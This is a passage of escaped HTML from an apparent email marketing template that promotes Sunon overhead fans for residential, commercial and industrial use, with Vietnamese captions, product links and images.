cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: andale mono,times; font-size: 14px; color: #1f1c1a; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px; font-family: impact, chicago;\\\">Overhead Residential Fans<br \\/><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-color v-line-height v-font-size\\\" style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: \'Crimson Text\',serif; font-size: 15px; font-weight: 400;\\\">\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t trong v\\u0103n ph\\u00f2ng, nh\\u00e0 \\u1edf:<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_3\\\" style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 14px; color: #236fa1; line-height: 100%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 100%;\\\"><span style=\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\">C\\u0103n tin, tr\\u01b0\\u1eddng h\\u1ecdc, b\\u1ec7nh vi\\u1ec7n<br \\/><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 100%;\\\"><span style=\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\">S\\u1ea3nh c\\u00f4ng ty, v\\u0103n ph\\u00f2ng, nh\\u00e0 \\u1edf<br \\/><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 100%;\\\"><span style=\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\">Qu\\u00e1n cafe, nh\\u00e0 h\\u00e0ng, qu\\u00e1n \\u0103n<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 100%;\\\"><span style=\\\"font-family: inherit; line-height: 14px; font-size: 14px;\\\">Garage \\u00f4t\\u00f4, x\\u01b0\\u1edfng b\\u1ea3o tr\\u00ec...<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s1\\\" style=\\\"height:37px; v-text-anchor:middle; width:293px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#079442;font-family: inherit; \\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s1\\\" target=\\\"_blank\\\" class=\\\"v-button v-font-size\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #079442; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:100%; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-family: inherit; font-size: 14px;\\\">\\r\\n      <span class=\\\"v-line-height\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM - SUNON PS1<br \\/><\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #ced4d9;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: andale mono,times; font-size: 14px; color: #a87f6b; line-height: 100%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 100%;\\\"><span style=\\\"font-size: 20px; line-height: 20px; font-family: impact, chicago;\\\">Overhead Commercial Fans<br \\/><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-color v-line-height v-font-size\\\" style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: \'Crimson Text\',serif; font-size: 15px; font-weight: 400;\\\">\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t trong v\\u0103n ph\\u00f2ng, th\\u01b0\\u01a1ng m\\u1ea1i:<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 14px; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\">Kh\\u00f4ng gian th\\u01b0\\u01a1ng m\\u1ea1i<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\">V\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\">Tr\\u1ea1m d\\u1eebng ch\\u00e2n, nh\\u00e0 ga<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\">Khu tr\\u01b0ng b\\u00e0y, tr\\u01b0\\u1eddng h\\u1ecdc..<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s3\\\" style=\\\"height:37px; v-text-anchor:middle; width:293px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#079442;font-family: inherit; \\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s3\\\" target=\\\"_blank\\\" class=\\\"v-button v-font-size\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #079442; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:100%; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-family: inherit; font-size: 14px;\\\">\\r\\n      <span class=\\\"v-line-height\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM - SUNON PS3<br \\/><\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"background-color: #ffffff;width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ffffff;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677162646997-sunon_ps3.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 315px;\\\" width=\\\"315\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #ced4d9;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677162712353-sunon_10_ps10.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 315px;\\\" width=\\\"315\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"background-color: #ffffff;width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ffffff;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: andale mono,times; font-size: 14px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px; font-family: impact, chicago;\\\">Overhead Industrial Fans<br \\/><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-color v-line-height v-font-size\\\" style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: book antiqua,palatino; font-size: 15px; font-weight: 400;\\\">\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t trong c\\u00f4ng nghi\\u1ec7p:<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td 